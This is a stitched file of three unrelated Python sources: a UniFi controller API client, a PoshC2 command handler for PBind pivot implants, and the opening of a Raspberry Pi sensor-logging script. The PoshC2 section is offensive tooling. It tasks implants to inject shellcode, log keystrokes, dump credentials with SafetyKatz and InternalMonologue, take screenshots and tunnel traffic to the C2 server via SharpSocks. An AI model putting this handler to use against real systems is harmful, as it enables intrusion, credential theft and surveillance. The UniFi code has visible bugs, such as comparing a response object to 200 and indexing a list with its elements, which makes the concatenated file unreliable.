"Controller version not supported: %s" % self.version
)
for site in self.get_sites():
if site["desc"] == name:
self.site_id = site["name"]
return True
raise APIError("No site %s found" % name)
    def get_alerts(self):
        """Return a list of all Alerts."""
        # NOTE(review): alarms are fetched with a POST (_api_write) rather
        # than a GET — presumably the controller requires POST here; verify.
        return self._api_write("stat/alarm")

    def get_alerts_unarchived(self):
        """Return a list of Alerts unarchived."""
        params = {"archived": False}
        return self._api_write("stat/alarm", params=params)

    def get_statistics_last_24h(self):
        """Returns statistical data of the last 24h"""
        return self.get_statistics_24h(time.time())

    def get_statistics_24h(self, endtime):
        """Return statistical data last 24h from time"""
        params = {
            "attrs": ["bytes", "num_sta", "time"],
            # Timestamps are sent in milliseconds. The window spans
            # [endtime - 24h, endtime - 1h].
            # NOTE(review): the end bound stops one hour short of endtime —
            # confirm whether that offset is intentional.
            "start": int(endtime - 86400) * 1000,
            "end": int(endtime - 3600) * 1000,
        }
        return self._api_write("stat/report/hourly.site", params)
    def get_events(self):
        """Return a list of all Events."""
        return self._api_read("stat/event")

    def get_aps(self):
        """Return a list of all APs,
        with significant information about each.
        """
        # Set test to 0 instead of NULL
        params = {"_depth": 2, "test": 0}
        return self._api_read("stat/device", params)

    def get_client(self, mac):
        """Get details about a specific client"""
        # stat/user/<mac> works better than stat/sta/<mac>
        # stat/sta seems to be only active clients
        # stat/user includes known but offline clients
        return self._api_read("stat/user/" + mac)[0]

    def get_clients(self):
        """Return a list of all active clients,
        with significant information about each.
        """
        return self._api_read("stat/sta")

    def get_users(self):
        """Return a list of all known clients,
        with significant information about each.
        """
        return self._api_read("list/user")

    def get_user_groups(self):
        """Return a list of user groups with its rate limiting settings."""
        return self._api_read("list/usergroup")

    def get_sysinfo(self):
        """Return basic system information."""
        return self._api_read("stat/sysinfo")

    def get_healthinfo(self):
        """Return health information."""
        return self._api_read("stat/health")

    def get_sites(self):
        """Return a list of all sites,
        with their UID and description"""
        # Site listing is controller-wide, so this bypasses the site-scoped
        # _api_read helper.
        return self._read(self.url + "api/self/sites")

    def get_wlan_conf(self):
        """Return a list of configured WLANs
        with their configuration parameters.
        """
        return self._api_read("list/wlanconf")
def _run_command(self, command, params=None, mgr="stamgr"):
if params is None:
params = {}
self.log.debug("_run_command(%s)", command)
params.update({"cmd": command})
return self._api_write("cmd/" + mgr, params=params)
def _mac_cmd(self, target_mac, command, mgr="stamgr", params=None):
if params is None:
params = {}
self.log.debug("_mac_cmd(%s, %s)", target_mac, command)
params["mac"] = target_mac
return self._run_command(command, params, mgr)
    def get_device_stat(self, target_mac):
        """Gets the current state & configuration of
        the given device based on its MAC Address.

        :param target_mac: MAC address of the device.
        :type target_mac: str
        :returns: Dictionary containing metadata, state,
            capabilities and configuration of the device
        :rtype: dict()
        """
        self.log.debug("get_device_stat(%s)", target_mac)
        params = {"macs": [target_mac]}
        return self._api_read("stat/device/" + target_mac, params)[0]

    def get_radius_users(self):
        """Return a list of all users, with their
        name, password, 24 digit user id, and 24 digit site id
        """
        return self._api_read('rest/account')

    def add_radius_user(self, name, password):
        """Add a new user with this username and password

        :param name: new user's username
        :param password: new user's password
        :returns: user's name, password, 24 digit user id, and 24 digit site id
        """
        params = {'name': name, 'x_password': password}
        return self._api_write('rest/account/', params)

    def update_radius_user(self, name, password, user_id):
        """Update a user to this new username and password

        :param name: user's new username
        :param password: user's new password
        :param user_id: the user's 24 digit user id, from get_radius_users()
            or add_radius_user()
        :returns: user's name, password, 24 digit user id, and 24 digit site id
        :returns: [] if no change was made
        """
        params = {'name': name, '_id': user_id, 'x_password': password}
        return self._api_update('rest/account/' + user_id, params)

    def delete_radius_user(self, user_id):
        """Delete user

        :param user_id: the user's 24 digit user id, from get_radius_users()
            or add_radius_user()
        :returns: [] if successful
        """
        return self._api_delete('rest/account/' + user_id)

    def get_switch_port_overrides(self, target_mac):
        """Gets a list of port overrides, in dictionary
        format, for the given target MAC address. The
        dictionary contains the port_idx, portconf_id,
        poe_mode, & name.

        :param target_mac: MAC address of the device.
        :type target_mac: str
        :returns: [ { 'port_idx': int(), 'portconf': str,
            'poe_mode': str, 'name': str } ]
        :rtype: list( dict() )
        """
        self.log.debug("get_switch_port_overrides(%s)", target_mac)
        return self.get_device_stat(target_mac)["port_overrides"]
def _switch_port_power(self, target_mac, port_idx, mode):
"""Helper method to set the given PoE mode the port/switch.
:param target_mac: MAC address of the Switch.
:type target_mac: str
:param port_idx: Port ID to target
:type port_idx: int
:param mode: PoE mode to set. ie. auto, on, off.
:type mode: str
:returns: { 'port_overrides': [ { 'port_idx': int(),
'portconf': str, 'poe_mode': str, 'name': str } ] }
:rtype: dict( list( dict() ) )
"""
# TODO: Switch operations should most likely happen in a
# different Class, Switch.
self.log.debug(
"_switch_port_power(%s, %s, %s)", target_mac, port_idx, mode
)
device_stat = self.get_device_stat(target_mac)
device_id = device_stat.get("_id")
overrides = device_stat.get("port_overrides")
found = False
if overrides:
for i in overrides:
if overrides[i]["port_idx"] == port_idx:
# Override already exists, update..
overrides[i]["poe_mode"] = mode
found = True
break
if not found:
# Retrieve portconf
portconf_id = None
for port in device_stat["port_table"]:
if port["port_idx"] == port_idx:
portconf_id = port["portconf_id"]
break
if portconf_id is None:
raise APIError(
"Port ID %s not found in port_table" % str(port_idx)
)
overrides.append(
{
"port_idx": port_idx,
"portconf_id": portconf_id,
"poe_mode": mode
}
)
# We return the device_id as it's needed by the parent method
return {"port_overrides": overrides, "device_id": device_id}
def switch_port_power_off(self, target_mac, port_idx):
"""Powers Off the given port on the Switch identified
by the given MAC Address.
:param target_mac: MAC address of the Switch.
:type target_mac: str
:param port_idx: Port ID to power off
:type port_idx: int
:returns: API Response which is the resulting complete port overrides
:rtype: list( dict() )
"""
self.log.debug("switch_port_power_off(%s, %s)", target_mac, port_idx)
params = self._switch_port_power(target_mac, port_idx, "off")
device_id = params["device_id"]
del params["device_id"]
return self._api_update("rest/device/" + device_id, params)
def switch_port_power_on(self, target_mac, port_idx):
"""Powers On the given port on the Switch identified
by the given MAC Address.
:param target_mac: MAC address of the Switch.
:type target_mac: str
:param port_idx: Port ID to power on
:type port_idx: int
:returns: API Response which is the resulting complete port overrides
:rtype: list( dict() )
"""
self.log.debug("switch_port_power_on(%s, %s)", target_mac, port_idx)
params = self._switch_port_power(target_mac, port_idx, "auto")
device_id = params["device_id"]
del params["device_id"]
return self._api_update("rest/device/" + device_id, params)
def create_site(self, desc="desc"):
"""Create a new site.
:param desc: Name of the site to be created.
"""
# TODO: Not currently supported on UDMP as site support doesn't exist.
if self.version == "UDMP-unifiOS":
raise APIError(
"Controller version not supported: %s" % self.version
)
return self._run_command(
"add-site",
params={"desc": desc},
mgr="sitemgr"
)
    def block_client(self, mac):
        """Add a client to the block list.

        :param mac: the MAC address of the client to block.
        """
        return self._mac_cmd(mac, "block-sta")

    def unblock_client(self, mac):
        """Remove a client from the block list.

        :param mac: the MAC address of the client to unblock.
        """
        return self._mac_cmd(mac, "unblock-sta")

    def disconnect_client(self, mac):
        """Disconnect a client.

        Disconnects a client, forcing them to reassociate. Useful when the
        connection is of bad quality to force a rescan.

        :param mac: the MAC address of the client to disconnect.
        """
        return self._mac_cmd(mac, "kick-sta")

    def restart_ap(self, mac):
        """Restart an access point (by MAC).

        :param mac: the MAC address of the AP to restart.
        """
        return self._mac_cmd(mac, "restart", "devmgr")

    def restart_ap_name(self, name):
        """Restart an access point (by name).

        :param name: the name address of the AP to restart.
        :returns: the restart API response, or None when no connected AP
            with that name is found.
        """
        if not name:
            raise APIError("%s is not a valid name" % str(name))
        # Only consider APs that are up (state == 1); silently does nothing
        # when no AP matches.
        for access_point in self.get_aps():
            if (
                access_point.get("state", 0) == 1
                and access_point.get("name", None) == name
            ):
                result = self.restart_ap(access_point["mac"])
                return result

    def archive_all_alerts(self):
        """Archive all Alerts"""
        return self._run_command("archive-all-alarms", mgr="evtmgr")
    # TODO: Not currently supported on UDMP as it now utilizes async-backups.
    def create_backup(self, days="0"):
        """Ask controller to create a backup archive file

        ..warning:
            This process puts significant load on the controller
            and may render it partially unresponsive for other requests.

        :param days: metrics of the last x days will be added to the backup.
            '-1' backup all metrics. '0' backup only the configuration.
        :return: URL path to backup file
        """
        if self.version == "UDMP-unifiOS":
            raise APIError(
                "Controller version not supported: %s" % self.version
            )
        res = self._run_command(
            "backup",
            mgr="system",
            params={"days": days}
        )
        # The command returns a single-element list whose entry carries the
        # download URL for the freshly created archive.
        return res[0]["url"]
# TODO: Not currently supported on UDMP as it now utilizes async-backups.
def get_backup(self, download_path=None, target_file="unifi-backup.unf"):
"""
:param download_path: path to backup; if None is given
one will be created
:param target_file: Filename or full path to download the
backup archive to, should have .unf extension for restore.
"""
if self.version == "UDMP-unifiOS":
raise APIError(
"Controller version not supported: %s" % self.version
)
if not download_path:
download_path = self.create_backup()
response = self.session.get(self.url + download_path, stream=True)
if response != 200:
raise APIError("API backup failed: %i" % response.status_code)
with open(target_file, "wb") as _backfh:
return shutil.copyfileobj(response.raw, _backfh)
    def authorize_guest(  # pylint: disable=R0913
        self,
        guest_mac,
        minutes,
        up_bandwidth=None,
        down_bandwidth=None,
        byte_quota=None,
        ap_mac=None,
    ):
        """
        Authorize a guest based on his MAC address.

        :param guest_mac: the guest MAC address: 'aa:bb:cc:dd:ee:ff'
        :param minutes: duration of the authorization in minutes
        :param up_bandwidth: up speed allowed in kbps
        :param down_bandwidth: down speed allowed in kbps
        :param byte_quota: quantity of bytes allowed in MB
        :param ap_mac: access point MAC address
        """
        cmd = "authorize-guest"
        params = {"mac": guest_mac, "minutes": minutes}
        # NOTE(review): truthiness checks mean an explicit 0 is treated the
        # same as "not given" for the optional limits.
        if up_bandwidth:
            params["up"] = up_bandwidth
        if down_bandwidth:
            params["down"] = down_bandwidth
        if byte_quota:
            params["bytes"] = byte_quota
        if ap_mac:
            params["ap_mac"] = ap_mac
        return self._run_command(cmd, params=params)

    def unauthorize_guest(self, guest_mac):
        """
        Unauthorize a guest based on his MAC address.

        :param guest_mac: the guest MAC address: 'aa:bb:cc:dd:ee:ff'
        """
        cmd = "unauthorize-guest"
        params = {"mac": guest_mac}
        return self._run_command(
            cmd,
            params=params
        )
def get_firmware(
self,
cached=True,
available=True,
known=False,
site=False
):
"""
Return a list of available/cached firmware versions
:param cached: Return cached firmwares
:param available: Return available (and not cached) firmwares
:param known: Return only firmwares for known devices
:param site: Return only firmwares for on-site devices
:return: List of firmware dicts
"""
res = []
if cached:
res.extend(self._run_command("list-cached", mgr="firmware"))
if available:
res.extend(self._run_command("list-available", mgr="firmware"))
if known:
res = [fw for fw in res if fw["knownDevice"]]
if site:
res = [fw for fw in res if fw["siteDevice"]]
return res
    def cache_firmware(self, version, device):
        """
        Cache the firmware on the UniFi Controller

        .. warning:: Caching one device might very well cache others,
            as they're on shared platforms

        :param version: version to cache
        :param device: device model to cache (e.g. BZ2)
        :return: True/False
        """
        return self._run_command(
            "download",
            mgr="firmware",
            params={
                "device": device,
                "version": version
            }
        )[0]["result"]

    def remove_firmware(self, version, device):
        """
        Remove cached firmware from the UniFi Controller

        .. warning:: Removing one device's firmware might very well remove
            others, as they're on shared platforms

        :param version: version to remove
        :param device: device model to remove (e.g. BZ2)
        :return: True/false
        """
        return self._run_command(
            "remove",
            mgr="firmware",
            params={
                "device": device,
                "version": version
            }
        )[0]["result"]

    def get_tag(self):
        """Get all tags and their member MACs"""
        return self._api_read("rest/tag")

    def upgrade_device(self, mac, version):
        """
        Upgrade a device's firmware to version

        :param mac: MAC of device
        :param version: version to upgrade to
        """
        self._mac_cmd(
            mac,
            "upgrade",
            mgr="devmgr",
            params={
                "upgrade_to_firmware": version
            }
        )

    def provision(self, mac):
        """
        Force provisioning of a device

        :param mac: MAC of device
        """
        self._mac_cmd(mac, "force-provision", mgr="devmgr")
    def get_setting(self, section=None, cs_settings=False):
        """
        Return settings for this site or controller

        :param cs_settings: Return only controller-wide settings
        :param section: Only return this/these section(s)
        :return: {section:settings}
        """
        res = {}
        all_settings = self._api_read("get/setting")
        # Accept a single section name as well as a list/tuple of names.
        if section and not isinstance(section, (list, tuple)):
            section = [section]
        for setting in all_settings:
            s_sect = setting["key"]
            # Site-scoped settings carry a site_id key; controller-wide ones
            # do not. Skip entries from the scope we were not asked for, and
            # entries outside the requested section filter.
            if (
                (cs_settings and "site_id" in setting)
                or (not cs_settings and "site_id" not in setting)
                or (section and s_sect not in section)
            ):
                continue
            # Strip bookkeeping keys so only the actual settings remain.
            for k in ("_id", "site_id", "key"):
                setting.pop(k, None)
            res[s_sect] = setting
        return res
def update_setting(self, settings):
"""
Update settings
:param settings: {section:{settings}}
:return: resulting settings
"""
res = []
for sect, setting in settings.items():
res.extend(self._api_write("set/setting/" + sect, setting))
return res
    def update_user_group(self, group_id, down_kbps=-1, up_kbps=-1):
        """
        Update user group bandwidth settings

        :param group_id: Group ID to modify
        :param down_kbps: New bandwidth in KBPS for download
        :param up_kbps: New bandwidth in KBPS for upload
        :raises ValueError: if group_id does not match any existing group
        """
        # NOTE(review): -1 appears to mean "unlimited" — confirm against the
        # controller API before relying on it.
        res = None
        groups = self.get_user_groups()
        for group in groups:
            if group["_id"] == group_id:
                # Apply setting change
                res = self._api_update(
                    "rest/usergroup/{0}".format(group_id),
                    {
                        "qos_rate_max_down": down_kbps,
                        "qos_rate_max_up": up_kbps,
                        "name": group["name"],
                        "_id": group_id,
                        "site_id": self.site_id,
                    },
                )
                return res
        raise ValueError("Group ID {0} is not valid.".format(group_id))
def set_client_alias(self, mac, alias):
"""
Set the client alias. Set to "" to reset to default
:param mac: The MAC of the client to rename
:param alias: The alias to set
"""
client = self.get_client(mac)["_id"]
return self._api_update("rest/user/" + client, {"name": alias})
    def create_voucher(  # pylint: disable=R0913
        self,
        number,
        quota,
        expire,
        up_bandwidth=None,
        down_bandwidth=None,
        byte_quota=None,
        note=None,
    ):
        """
        Create voucher for guests.

        :param number: number of vouchers
        :param quota: number of using; 0 = unlimited
        :param expire: expiration of voucher in minutes
        :param up_bandwidth: up speed allowed in kbps
        :param down_bandwidth: down speed allowed in kbps
        :param byte_quota: quantity of bytes allowed in MB
        :param note: description
        """
        cmd = "create-voucher"
        params = {
            "n": number,
            "quota": quota,
            # "custom" expiry with expire_unit 1 presumably expresses the
            # lifetime directly in minutes — TODO confirm against the API.
            "expire": "custom",
            "expire_number": expire,
            "expire_unit": 1,
        }
        if up_bandwidth:
            params["up"] = up_bandwidth
        if down_bandwidth:
            params["down"] = down_bandwidth
        if byte_quota:
            params["bytes"] = byte_quota
        if note:
            params["note"] = note
        res = self._run_command(cmd, mgr="hotspot", params=params)
        # Look the vouchers back up by creation time so the caller receives
        # the full voucher records (including the generated codes).
        return self.list_vouchers(create_time=res[0]["create_time"])
def list_vouchers(self, **filter_voucher):
"""
Get list of vouchers
:param filter_voucher: Filter vouchers by create_time, code, quota,
used, note, status_expires, status, ...
"""
if "code" in filter_voucher:
filter_voucher["code"] = filter_voucher["code"].replace("-", "")
vouchers = []
for voucher in self._api_read("stat/voucher"):
voucher_match = True
for key, val in filter_voucher.items():
voucher_match &= voucher.get(key) == val
if voucher_match:
vouchers.append(voucher)
return vouchers
def delete_voucher(self, voucher_id):
"""
Delete / revoke voucher
:param id: id of voucher
"""
cmd = "delete-voucher"
params = {"_id": voucher_id}
self._run_command(cmd, mgr="hotspot", params=params)
|
|
import base64, re, traceback, os, string, sys
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import cs_alias, cs_replace
from poshc2.Colours import Colours
from poshc2.Utils import validate_sleep_time, argp, load_file, gen_key
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp
from poshc2.client.Help import sharp_help, allhelp
from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory
from poshc2.server.Config import PBindPipeName, PBindSecret
from poshc2.server.Core import print_bad
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.server.database.DB import new_task, unhide_implant, kill_implant, get_implantdetails, get_sharpurls, get_baseenckey
from poshc2.server.database.DB import select_item, new_c2_message, get_powerstatusbyrandomuri, update_label, get_randomuri
def handle_pbind_pivot_command(command, user, randomuri, implant_id):
    """Dispatch an operator command for a pbind-pivot (chained SMB) implant.

    Resolves the parent implant from the current implant's label, applies
    alias mappings, then translates the command into the appropriate
    'pbind-pivot-*' task for the implant.

    :param command: raw command string typed by the operator
    :param user: operator name recorded against the queued task
    :param randomuri: URI of the implant the operator is interacting with
    :param implant_id: unused here; kept for interface parity with the
        other command handlers
    """
    # convert randomuri to parent randomuri
    oldrandomuri = randomuri
    p = get_implantdetails(randomuri)
    # NOTE(review): .group() raises AttributeError when the label has no
    # whitespace-preceded token, so the None check below never fires — the
    # failure mode is an exception, not a skipped branch. Verify.
    newimplant_id = re.search(r'(?<=\s)\S*', p.Label).group()
    if newimplant_id is not None:
        randomuri = get_randomuri(newimplant_id)
    # alias mapping
    for alias in cs_alias:
        if alias[0] == command[:len(command.rstrip())]:
            command = alias[1]
    # alias replace
    for alias in cs_replace:
        if command.startswith(alias[0]):
            command = command.replace(alias[0], alias[1])
    # Keep the untrimmed command for the final fall-through task.
    original_command = command
    command = command.strip()
    run_autoloads_sharp(command, randomuri, user, loadmodule_command="pbind-pivot-loadmodule")
    # --- local (server-side) helper commands ---
    if command.startswith("searchhistory"):
        searchterm = (command).replace("searchhistory ", "")
        with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
            for line in hisfile:
                if searchterm in line.lower():
                    print(Colours.GREEN + line.replace("+",""))
    elif command.startswith("searchhelp"):
        searchterm = (command).replace("searchhelp ", "")
        helpful = sharp_help.split('\n')
        for line in helpful:
            if searchterm in line.lower():
                print(Colours.GREEN + line)
    elif command.startswith("searchallhelp"):
        searchterm = (command).replace("searchallhelp ", "")
        for line in allhelp:
            if searchterm in line.lower():
                print(Colours.GREEN + line)
    elif command.startswith("upload-file"):
        source = ""
        destination = ""
        # Bare "upload-file" prompts interactively; otherwise the paths are
        # parsed from the command line.
        if command == "upload-file":
            style = Style.from_dict({
                '': '#80d130',
            })
            session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
            try:
                source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
                source = PayloadsDirectory + source
            except KeyboardInterrupt:
                return
            while not os.path.isfile(source):
                print("File does not exist: %s" % source)
                source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
                source = PayloadsDirectory + source
            destination = session.prompt("Location to upload to: ")
        else:
            args = argp(command)
            source = args.source
            destination = args.destination
        try:
            # Escape backslashes so the Windows path survives re-parsing.
            destination = destination.replace("\\", "\\\\")
            print("")
            print("Uploading %s to %s" % (source, destination))
            uploadcommand = f"upload-file {source} {destination}"
            new_task(f"pbind-pivot-command {uploadcommand}", user, randomuri)
        except Exception as e:
            print_bad("Error with source file: %s" % e)
            traceback.print_exc()
    elif command.startswith("unhide-implant"):
        unhide_implant(oldrandomuri)
    elif command.startswith("hide-implant"):
        kill_implant(oldrandomuri)
    elif command.startswith("inject-shellcode"):
        params = re.compile("inject-shellcode", re.IGNORECASE)
        params = params.sub("", command)
        style = Style.from_dict({
            '': '#80d130',
        })
        session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
        try:
            path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
            path = PayloadsDirectory + path
        except KeyboardInterrupt:
            return
        try:
            shellcodefile = load_file(path)
            if shellcodefile is not None:
                # Shellcode is shipped base64-encoded; the trailing comment
                # (#filename) is informational for the task log.
                new_task("pbind-pivot-command run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
        except Exception as e:
            print("Error loading file: %s" % e)
    elif command.startswith("migrate"):
        params = re.compile("migrate", re.IGNORECASE)
        params = params.sub("", command)
        migrate(randomuri, user, params)
    elif command == "kill-implant" or command == "exit":
        impid = get_implantdetails(randomuri)
        ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
        if ri.lower() == "n":
            print("Implant not terminated")
        if ri == "" or ri.lower() == "y":
            new_task("pbind-pivot-kill", user, randomuri)
            kill_implant(oldrandomuri)
    elif command == "sharpsocks":
        from random import choice
        allchar = string.ascii_letters
        channel = "".join(choice(allchar) for x in range(25))
        sharpkey = gen_key().decode("utf-8")
        sharpurls = get_sharpurls()
        sharpurls = sharpurls.split(",")
        sharpurl = select_item("HostnameIP", "C2Server")
        print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
        print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
        print("\nElse\n")
        print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
        ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
        if ri.lower() == "n":
            print("")
        # Empty input counts as "yes" (default answer).
        if ri == "":
            new_task("pbind-pivot-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri)
        if ri.lower() == "y":
            new_task("pbind-pivot-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri)
    elif (command.startswith("stop-keystrokes")):
        new_task("pbind-pivot-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
        update_label("", randomuri)
    elif (command.startswith("start-keystrokes")):
        check_module_loaded("Logger.exe", oldrandomuri, user)
        new_task("pbind-pivot-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
        update_label("KEYLOG", randomuri)
    elif (command.startswith("get-keystrokes")):
        new_task("pbind-pivot-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
    # NOTE: the "multi" variant must be matched before the plain
    # "get-screenshot" prefix below.
    elif (command.startswith("get-screenshotmulti")):
        pwrStatus = get_powerstatusbyrandomuri(randomuri)
        if (pwrStatus is not None and pwrStatus[7]):
            ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
            if ri.lower() == "n" or ri.lower() == "":
                return
        new_task(f"pbind-pivot-command {command}", user, randomuri)
        update_label("SCREENSHOT", randomuri)
    elif (command.startswith("get-screenshot")):
        pwrStatus = get_powerstatusbyrandomuri(randomuri)
        if (pwrStatus is not None and pwrStatus[7]):
            ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
            if ri.lower() == "n" or ri.lower() == "":
                return
        new_task(f"pbind-pivot-command {command}", user, randomuri)
    elif (command == "get-powerstatus"):
        getpowerstatus(randomuri)
        new_task("pbind-pivot-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
    elif (command == "getpowerstatus"):
        getpowerstatus(randomuri)
        new_task("pbind-pivot-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
    elif (command.startswith("stop-powerstatus")):
        new_task(f"pbind-pivot-command {command}", user, randomuri)
        update_label("", randomuri)
    elif (command.startswith("stoppowerstatus")):
        new_task(f"pbind-pivot-command {command}", user, randomuri)
        update_label("", randomuri)
    elif (command.startswith("pslo")):
        new_task(f"pbind-{command}", user, randomuri)
    elif (command.startswith("run-exe SharpWMI.Program")) and "execute" in command and "payload" not in command:
        style = Style.from_dict({'': '#80d130'})
        session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
        try:
            path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
            path = PayloadsDirectory + path
        except KeyboardInterrupt:
            return
        if os.path.isfile(path):
            with open(path, "r") as p:
                payload = p.read()
            new_task("pbind-pivot-command %s payload=%s" % (command,payload), user, randomuri)
        else:
            print_bad("Could not find file")
    elif (command.startswith("get-hash")):
        check_module_loaded("InternalMonologue.exe", oldrandomuri, user)
        new_task("pbind-pivot-command run-exe InternalMonologue.Program InternalMonologue", user, randomuri)
    elif (command.startswith("safetykatz")):
        new_task("pbind-pivot-command run-exe SafetyKatz.Program %s" % command, user, randomuri)
    # "loadmoduleforce" must be tested before the "loadmodule" prefix.
    elif command.startswith("loadmoduleforce"):
        params = re.compile("loadmoduleforce ", re.IGNORECASE)
        params = params.sub("", command)
        new_task("pbind-pivot-loadmodule %s" % params, user, randomuri)
    elif command.startswith("loadmodule"):
        params = re.compile("loadmodule ", re.IGNORECASE)
        params = params.sub("", command)
        new_task("pbind-pivot-loadmodule %s" % params, user, randomuri)
    elif command.startswith("listmodules"):
        modules = os.listdir("%s/Modules/" % PoshInstallDirectory)
        modules = sorted(modules, key=lambda s: s.lower())
        print("")
        print("[+] Available modules:")
        print("")
        for mod in modules:
            if (".exe" in mod) or (".dll" in mod):
                print(mod)
    elif command.startswith("modulesloaded"):
        ml = get_implantdetails(oldrandomuri)
        print(ml.ModsLoaded)
        new_task("pbind-pivot-command listmodules", user, randomuri)
    elif command == "help" or command == "?":
        print(sharp_help)
    elif command.startswith("pbind-connect"):
        do_pbind_start(user, command, randomuri)
    elif command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"):
        new_sleep = command.replace('set-beacon ', '')
        new_sleep = new_sleep.replace('setbeacon ', '')
        new_sleep = new_sleep.replace('beacon ', '').strip()
        if not validate_sleep_time(new_sleep):
            print(Colours.RED)
            print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
            print(Colours.GREEN)
        else:
            new_task(f"pbind-pivot-command {command}", user, randomuri)
    else:
        # Anything unrecognized is forwarded to the implant verbatim.
        if command:
            new_task(f"pbind-pivot-command {original_command}", user, randomuri)
    return
def do_pbind_start(user, command, randomuri):
    """Queue the task that opens a PBind named-pipe pivot session.

    Fills in the configured pipe name, shared secret and encryption key the
    connect command needs, then rewrites it into the run-exe PBind invocation
    the implant understands before queueing it with new_task().
    """
    key = get_baseenckey()
    if len(command.split()) == 2:  # 'pbind-connect <hostname>' is two args
        # Only the hostname was given; append the configured pipe name,
        # shared secret and base encryption key.
        command = f"{command} {PBindPipeName} {PBindSecret} {key}"
    elif len(command.split()) == 4:  # if the pipe name and secret are already present just add the key
        command = f"{command} {key}"
    else:
        # Fixed: the usage text previously said 'pbind_connect' (underscore)
        # although the command dispatched to this handler is 'pbind-connect'.
        print_bad("Expected 'pbind-connect <hostname>' or 'pbind-connect <hostname> <pipename> <secret>'")
        return
    # Translate the operator command into the implant's PBind run-exe syntax.
    if command.startswith("pbind-pivot-command "):
        command = command.replace("pbind-pivot-command ", "pbind-pivot-command run-exe PBind PBind ")
    elif command.startswith("pbind-connect"):
        command = command.replace("pbind-connect ", "pbind-pivot-command run-exe PBind PBind start ")
    elif command.startswith("pbind-kill"):
        command = command.replace("pbind-kill", "pbind-pivot-command run-exe PBind PBind kill-implant")
    new_task(command, user, randomuri)
def migrate(randomuri, user, params=""):
    # Migration is unsupported over a PBind (named-pipe) channel; tell the
    # operator to use Inject-Shellcode instead.  The parameters exist only to
    # match the shared command-handler signature and are ignored.
    print("Do not use migrate when in a pbind implant - use Inject-Shellcode")
|
|
#-----------------------------------------------------------------
#Imports
#-----------------------------------------------------------------
import time
import os
import sys
import signal
#-----------------------------------------------------------------
# System import for Raspberry Pi drivers
#-----------------------------------------------------------------
# Load the 1-Wire GPIO and thermal kernel modules used by the temperature
# sensors (presumably DS18B20-style 1-Wire probes -- TODO confirm hardware).
# Requires root privileges.
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
#-----------------------------------------------------------------
# Adafruit Library for current sense chip
#-----------------------------------------------------------------
import Adafruit_ADS1x15
# Single shared ADC instance; channels 0-3 are sampled in getADCValues().
adc = Adafruit_ADS1x15.ADS1015()
# Gain setting passed to every read_adc() call.
# NOTE(review): GAIN = 1 presumably selects the ADS1015 +/-4.096V input
# range -- confirm against the board wiring.
GAIN = 1
#-----------------------------------------------------------------
# Globals
# menuChoice      - Variable for the main menu
# storagePath     - Variable to define the subfolder to store data
# fileExt         - Variable to define the extension of the stored file
# filePath        - Variable to define the file name
# sampleRate      - Variable to define the amount of time to wait between
#                 - current sense samples
# temperatureUnit - Variable to define the temperature unit to use
# startTime       - Epoch time used as the t=0 reference for DAQ rows
#-----------------------------------------------------------------
menuChoice = ''
storagePath = "/testing/"
fileExt = ".txt"
filePath = 'DefaultName'
sampleRate = 10  # fixed: removed the stray trailing semicolon
temperatureUnit = "B"  # "C", "F" or "B" (both)
startTime = time.time()
#-----------------------------------------------------------------
# Channel lookup tables.
# currentLabels / currentStatus describe the four current-sense jumpers;
# thermoLabels / thermoAddress / thermoStatus describe the eight
# 1-Wire thermocouple channels T0..T7.
#-----------------------------------------------------------------
# Net name measured at each current-sense jumper.
currentLabels = {
    'J6': "1V0",
    'J10': "1V2",
    'J8': "3V3",
    'J3': "1V8",
}
